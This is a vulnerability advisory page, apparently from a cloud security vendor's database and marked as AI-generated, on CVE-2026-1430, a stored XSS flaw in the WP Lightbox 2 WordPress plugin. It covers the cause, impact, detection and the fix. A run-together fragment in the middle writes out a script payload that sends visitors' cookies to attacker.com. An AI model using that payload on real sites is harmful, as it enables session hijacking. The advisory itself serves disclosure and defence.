
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1430 is a Stored Cross-Site Scripting (XSS) vulnerability in the WP Lightbox 2 WordPress plugin affecting all versions before 3.0.7. The flaw allows high-privilege users (e.g., administrators) to inject and store malicious scripts via unsanitized plugin settings, even when the unfiltered_html capability is disabled — a scenario common in WordPress multisite environments. It was publicly disclosed on March 5, 2026, and assigned a CVSS v3.1 base score of 4.8 (Medium/Low) by NVD and 3.5 (Low) by WPScan (WPScan).
The root cause is improper neutralization of user-controlled input in plugin settings before output to the browser (CWE-79). Specifically, the "Additional text below image info" field in the Lightbox General Settings does not sanitize or escape input, allowing an attacker with admin-level access to inject arbitrary HTML/JavaScript. The payload is stored server-side and executed in the browser of any user who views a post or page containing the lightbox shortcode and clicks on an image link. A proof-of-concept was published by researcher Krugov Artyom via CleanTalk Research, demonstrating the injection using a crafted <script> payload in the settings field combined with a shortcode block on a post (WPScan, CleanTalk Research).
Successful exploitation allows a malicious or compromised administrator to persistently inject JavaScript that executes in the browsers of site visitors or other authenticated users who trigger the lightbox. This can lead to session cookie theft, credential harvesting, defacement, or redirection to malicious sites. In WordPress multisite environments, the impact is elevated because the unfiltered_html restriction — typically used to limit such attacks — does not prevent this vulnerability (WPScan).
A public proof-of-concept is available via WPScan and CleanTalk Research, demonstrating the full exploitation path. The EPSS score is approximately 0.029% (0.000290), indicating low predicted exploitation probability in the near term. No evidence of in-the-wild exploitation or threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires high-privilege (admin-level) access, which significantly limits the attack surface (WPScan).
"><script>document.location='https://attacker.com/steal?c='+document.cookie</script>.<a href="image.jpg">image #1</a>) that triggers the lightbox.wp_options table (option name related to wp-lightbox-2 settings) containing <script> tags or encoded JavaScript.<script>, onerror=, javascript:) within the wp_options table entries associated with the WP Lightbox 2 plugin (WPScan).Update the WP Lightbox 2 plugin to version 3.0.7 or later, which includes proper sanitization and escaping of plugin settings. No official configuration-based workaround has been published; the recommended action is immediate upgrade. Site administrators should also audit plugin settings for any pre-existing malicious payloads and review admin account activity logs for unauthorized changes (WPScan).
The vulnerability was discovered and reported by Krugov Artyom of CleanTalk Research, who also published a detailed write-up. It was verified and added to the WPScan vulnerability database on March 5, 2026. Coverage has been limited to security aggregator sites and automated CVE tracking feeds, with no significant broader media or social media discussion noted beyond standard CVE announcement channels (WPScan).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."